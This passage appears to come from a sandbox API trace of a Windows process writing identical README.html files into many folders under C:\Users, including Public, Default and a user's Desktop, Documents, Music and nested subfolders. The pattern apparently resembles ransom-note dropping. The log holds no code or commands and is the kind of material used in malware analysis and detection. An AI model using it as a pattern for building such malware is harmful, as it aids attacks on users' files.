(hObject=0x17c) returned 1 [0257.031] CreateFileW (lpFileName="C:\\\\Users\\Default\\Videos\\README.html" (normalized: "c:\\users\\default\\videos\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.031] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.031] WriteFile (in: hFile=0x17c, lpBuffer=0x12645100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12645100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.033] CloseHandle (hObject=0x17c) returned 1 [0257.037] CreateFileW (lpFileName="C:\\\\Users\\Public\\README.html" (normalized: "c:\\users\\public\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.038] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.038] WriteFile (in: hFile=0x17c, lpBuffer=0x12728000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12728000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.040] CloseHandle (hObject=0x17c) returned 1 [0257.040] CreateFileW (lpFileName="C:\\\\Users\\Public\\AccountPictures\\README.html" (normalized: "c:\\users\\public\\accountpictures\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.041] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.041] WriteFile (in: hFile=0x17c, lpBuffer=0x12728d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12728d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.043] CloseHandle (hObject=0x17c) returned 1 [0257.043] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\README.html" (normalized: "c:\\users\\public\\desktop\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.050] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.050] WriteFile (in: hFile=0x17c, lpBuffer=0x12729b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12729b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.066] CloseHandle (hObject=0x17c) returned 1 [0257.068] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\README.html" (normalized: "c:\\users\\public\\documents\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.070] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.070] WriteFile (in: hFile=0x17c, lpBuffer=0x1272a880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1272a880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.071] CloseHandle (hObject=0x17c) returned 1 [0257.072] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads\\README.html" (normalized: "c:\\users\\public\\downloads\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.072] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.072] WriteFile (in: hFile=0x17c, lpBuffer=0x1272b600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1272b600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.074] CloseHandle (hObject=0x17c) returned 1 [0257.075] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\README.html" (normalized: "c:\\users\\public\\libraries\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.075] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.075] WriteFile (in: hFile=0x17c, lpBuffer=0x1272c380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1272c380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.077] CloseHandle (hObject=0x17c) returned 1 [0257.077] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\README.html" (normalized: "c:\\users\\public\\music\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.078] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.078] WriteFile (in: hFile=0x17c, lpBuffer=0x1272d100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1272d100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.079] CloseHandle (hObject=0x17c) returned 1 [0257.079] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\README.html" (normalized: "c:\\users\\public\\pictures\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.080] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.080] WriteFile (in: hFile=0x17c, lpBuffer=0x12656000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12656000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.081] CloseHandle (hObject=0x17c) returned 1 [0257.082] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\README.html" (normalized: "c:\\users\\public\\videos\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.082] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.082] WriteFile (in: hFile=0x17c, lpBuffer=0x12656d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12656d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.083] CloseHandle (hObject=0x17c) returned 1 [0257.084] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.084] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.084] WriteFile (in: hFile=0x17c, lpBuffer=0x12657b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12657b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.086] CloseHandle (hObject=0x17c) returned 1 [0257.086] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Contacts\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.086] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.086] WriteFile (in: hFile=0x17c, lpBuffer=0x12658880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12658880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.088] CloseHandle (hObject=0x17c) returned 1 [0257.088] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.090] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.090] WriteFile (in: hFile=0x17c, lpBuffer=0x12659600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12659600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.091] CloseHandle (hObject=0x17c) returned 1 [0257.093] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.522] SetEvent (hEvent=0x150) returned 1 [0257.522] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.522] WriteFile (in: hFile=0x17c, lpBuffer=0x1265a380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1265a380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.524] CloseHandle (hObject=0x17c) returned 1 [0257.525] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.527] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.527] WriteFile (in: hFile=0x17c, lpBuffer=0x1265b100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1265b100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.528] CloseHandle (hObject=0x17c) returned 1 [0257.530] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.532] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.532] WriteFile (in: hFile=0x17c, lpBuffer=0x1239c000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1239c000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.533] CloseHandle (hObject=0x17c) returned 1 [0257.535] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.536] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.536] WriteFile (in: hFile=0x17c, lpBuffer=0x1239cd80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1239cd80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.537] CloseHandle (hObject=0x17c) returned 1 [0257.539] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.539] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.539] WriteFile (in: hFile=0x17c, lpBuffer=0x1239db00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1239db00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.541] CloseHandle (hObject=0x17c) returned 1 [0257.541] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.542] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.542] WriteFile (in: hFile=0x17c, lpBuffer=0x1239e880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1239e880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.544] CloseHandle (hObject=0x17c) returned 1 [0257.544] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.545] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.545] WriteFile (in: hFile=0x17c, lpBuffer=0x1239f600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1239f600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.546] CloseHandle (hObject=0x17c) returned 1 [0257.547] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.548] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.548] WriteFile (in: hFile=0x17c, lpBuffer=0x123a0380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x123a0380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.552] CloseHandle (hObject=0x17c) returned 1 [0257.552] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Downloads\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.553] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.553] WriteFile (in: hFile=0x17c, lpBuffer=0x123a1100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x123a1100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.554] CloseHandle (hObject=0x17c) returned 1 [0257.555] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Favorites\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.656] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.656] WriteFile (in: hFile=0x17c, lpBuffer=0x12366000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12366000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.657] CloseHandle (hObject=0x17c) returned 1 [0257.659] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.660] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.660] WriteFile (in: hFile=0x17c, lpBuffer=0x12366d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12366d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.662] CloseHandle (hObject=0x17c) returned 1 [0257.663] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Links\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.672] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.672] WriteFile (in: hFile=0x17c, lpBuffer=0x12367b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12367b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.673] CloseHandle (hObject=0x17c) returned 1 [0257.674] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.674] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.674] WriteFile (in: hFile=0x17c, lpBuffer=0x12368880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12368880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.676] CloseHandle (hObject=0x17c) returned 1 [0257.676] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.676] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.676] WriteFile (in: hFile=0x17c, lpBuffer=0x12369600*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12369600*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.678] CloseHandle (hObject=0x17c) returned 1 [0257.678] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.678] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.678] WriteFile (in: hFile=0x17c, lpBuffer=0x1236a380*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1236a380*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.679] CloseHandle (hObject=0x17c) returned 1 [0257.680] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.680] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.680] WriteFile (in: hFile=0x17c, lpBuffer=0x1236b100*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x1236b100*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.681] CloseHandle (hObject=0x17c) returned 1 [0257.682] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.690] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.690] WriteFile (in: hFile=0x17c, lpBuffer=0x12662000*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12662000*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.691] CloseHandle (hObject=0x17c) returned 1 [0257.691] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.692] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.692] WriteFile (in: hFile=0x17c, lpBuffer=0x12662d80*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12662d80*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.693] CloseHandle (hObject=0x17c) returned 1 [0257.693] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.708] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.708] WriteFile (in: hFile=0x17c, lpBuffer=0x12663b00*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12663b00*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.709] CloseHandle (hObject=0x17c) returned 1 [0257.710] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.710] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.710] WriteFile (in: hFile=0x17c, lpBuffer=0x12664880*, nNumberOfBytesToWrite=0xc88, lpNumberOfBytesWritten=0x12371e28, lpOverlapped=0x0 | out: lpBuffer=0x12664880*, lpNumberOfBytesWritten=0x12371e28*=0xc88, lpOverlapped=0x0) returned 1 [0257.711] CloseHandle (hObject=0x17c) returned 1 [0257.712] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\README.html" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\readme.html"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0257.712] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x12371e38 | out: lpMode=0x12371e38) returned 0 [0257.712] WriteFile (in: hFile=0x17c, lpBuffer=0x12665600*, 